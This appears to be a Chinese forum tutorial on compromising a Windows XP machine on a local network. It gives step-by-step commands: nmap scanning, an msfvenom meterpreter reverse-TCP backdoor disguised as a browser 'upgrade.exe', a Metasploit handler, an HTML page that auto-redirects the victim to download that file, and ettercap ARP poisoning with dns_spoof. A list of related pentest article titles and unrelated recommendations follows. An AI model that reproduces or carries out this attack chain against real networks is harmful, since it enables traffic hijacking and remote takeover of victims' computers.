文章来源i春秋

这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图

更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1-1.html
<ignore_js_op> 
这个被框住的IP就是我的目标192.16它8.1.117接下来输入nmap –sC 192.168.1.117这句语句的意思是探测主机类型以及其它信息(nmap非常强大,要多利用)
<ignore_js_op> 
当然这个目标主机我打过补丁了一些漏洞无法利用例如非常流行的MS08-067这个漏洞,好吧不水了上肉戏,接下来就要玩DNS欺骗了不过提前我们要先做个后门程序很简单用一道命令就可以msfVENOM -p  windows/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f exe > /var/www/html/upgrade.exe  IP你可以换成自己的,不过可能被杀,你可以直接手动免杀一下,免杀我就不讲了
<ignore_js_op> 
在终端输入msfconsole启动Metasploit如图
<ignore_js_op> 
再依次输入以下语句
use exploit/multi/handler
set LHOST 192.168.1.116
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
show options
exploit
这些语句的意思是设置自己的ip和端口查看配置启动exploit然后等待程序运行我懒得一个个表明大致说一下就行,接下来就是DNS欺骗了首先找到这个路经etc/ettercap/修改这个文件etter.dns
<ignore_js_op> 
红框圈住的地方是我添加的我的IP地址,你们可以学着我添加不过要是自己主机的IP才可以,修改完后保存一下,然后在转到这个目录/var/www/html/修改这个文件index.html代码如下

[AppleScript] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>请下载进行升级浏览器</title>
</head>
<body>
<script language="javascript">
window.onload = function(){
window.location.href="upgrade.exe";
}
</script>
</body>
</html>

当然你可愿意自己写一些其它的,不过我一般喜欢这种,修改之后再把我们刚开始生产的后门复制到这个目录下/var/www/html/转到终端输入/etc/init.d/apache2 start启动apache2服务器(意思就是把本机当作服务器)接下来转到终端输入ettercap –G进入ettercap图形化界面
<ignore_js_op>                                  <ignore_js_op> 
点解unified sniffing选择网卡点确定 接下来按顺序点scan for hosts和Hosts list扫描和列出主机
<ignore_js_op><ignore_js_op> 
接下来我这里的网关是192.18.1.1我点击一下网关地址再点击Add to target 1然后再点击我要攻击的地址在选择Add to target 2
<ignore_js_op> 
接下来选择mitm中的arp poisoning选项它会弹出一个窗口你直接选择第一个点确定
然后在选择选项跳到这个页面我们玩的是欺骗所以双击dns_spoof
<ignore_js_op> 
再然后我们就选择strat中的start sniffing选项开始DNS欺骗
然后目标主机只要打开网站就会有这种情况,不管访问任何网站
<ignore_js_op> 
接下来对方下载文件运行一下就会启发我们的后门
<ignore_js_op><ignore_js_op>

触发成功后就是这样接下来你先干什么都可以了不过前提你最好会一些dos命令你可以输入shell进入他的系统命令行状态
我这有些乱码 好了 就这样吧 

kali渗透windowsXP过程的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. kali linux 安装过程

    kali linux 安装过程 获取镜像文件 首先需要去官网获取kali linux的镜像文件,本来获取了kali的最新版,由于有些方面还没有得到完善,与VM还没有完全兼容,所以换了视频上的1.0.8 ...

  3. kali渗透综合靶机(一)--Lazysysadmin靶机

    kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...

  4. kali渗透综合靶机(十八)--FourAndSix2靶机

    kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...

  5. kali渗透综合靶机(十七)--HackInOS靶机

    kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一.主机发现 1.netdiscover ...

  6. kali渗透综合靶机(十六)--evilscience靶机

    kali渗透综合靶机(十六)--evilscience靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --ra ...

  7. kali渗透综合靶机(十五)--Breach-1.0靶机

    kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...

  8. kali渗透综合靶机(十四)--g0rmint靶机

    kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...

  9. kali渗透综合靶机(十三)--Dina 1.0靶机

    kali渗透综合靶机(十三)--Dina 1.0靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate= ...

随机推荐

  1. 第四篇、Python文件处理

    1.文件操作 1) 文件操作流程 a. 打开文件,得到文件句柄并赋值给一个变量 b. 通过句柄对文件进行操作 c. 关闭文件 f=open('a.txt','r',encoding='utf-8') ...

  2. JS event loop

    一.为什么JavaScript是单线程? JavaScript语言的一大特点就是单线程,也就是说,同一个时间只能做一件事.那么,为什么JavaScript不能有多个线程呢?这样能提高效率啊. Java ...

  3. xtrabackup备份还原MySQL数据库

    mysqldump 备份鉴于其自身的某些特性(锁表,本质上备份出来insert脚本或者文本,不支持差异备份),不太适合对实时性要求比较高的情况Xtrabackup可以解决mysqldump存在的上述的 ...

  4. Mask RCNN 源码阅读(update)

    之前看了Google官网的object_dectect 的源码,感觉Google大神写的还不错.最近想玩下Mask RCNN,就看了下源码,这里刚好当做总结和梳理.链接如下: Google官网的obj ...

  5. 2018面向对象程序设计(Java)第17周学习指导及要求

    2018面向对象程序设计(Java)第17周学习指导及要求(2018.12.20-2018.12.23)   学习目标 (1) 掌握线程同步的概念及实现技术: (2) Java线程综合编程练习 学习资 ...

  6. position:fix相对父元素定位

    大家都知道,当position的值为fix时,生成绝对定位的元素,相对于浏览器窗口进行定位. 它常常应用的场合是,当下拉滚动条时固定导航栏到顶部,将广告固定在页面两侧或浏览器中间. 如果需要将导航栏d ...

  7. 大数据入门到精通6---spark rdd reduce by key 的使用方法

    1.前期数据准备(同之前的章节) val collegesRdd= sc.textFile("/user/hdfs/CollegeNavigator.csv")val header ...

  8. TPL DataFlow初探(二)

    上一篇简单的介绍了TDF提供的一些Block,通过对这些Block配置和组合,可以满足很多的数据处理的场景.这一篇将继续介绍与这些Block配置的相关类,和挖掘一些高级功能. 在一些Block的构造函 ...

  9. Solidity的三种转账方式与比较

    转账的3种方式 123 address.transfer()address.send()address.call.value().gas()() 转账transfer 12345678910 func ...

  10. 小豆包的学习之旅:占用概率栅格地图和cost-map

    接下来将制图和定位问题分别进行介绍.这两个问题可以视为SLAM过程中两个相互联系的子问题,但是也可以视为两个单独的问题.虽然说SLAM问题是鸡和蛋的问题,但是在实际处理过程中总是有先后的.为了简化问题 ...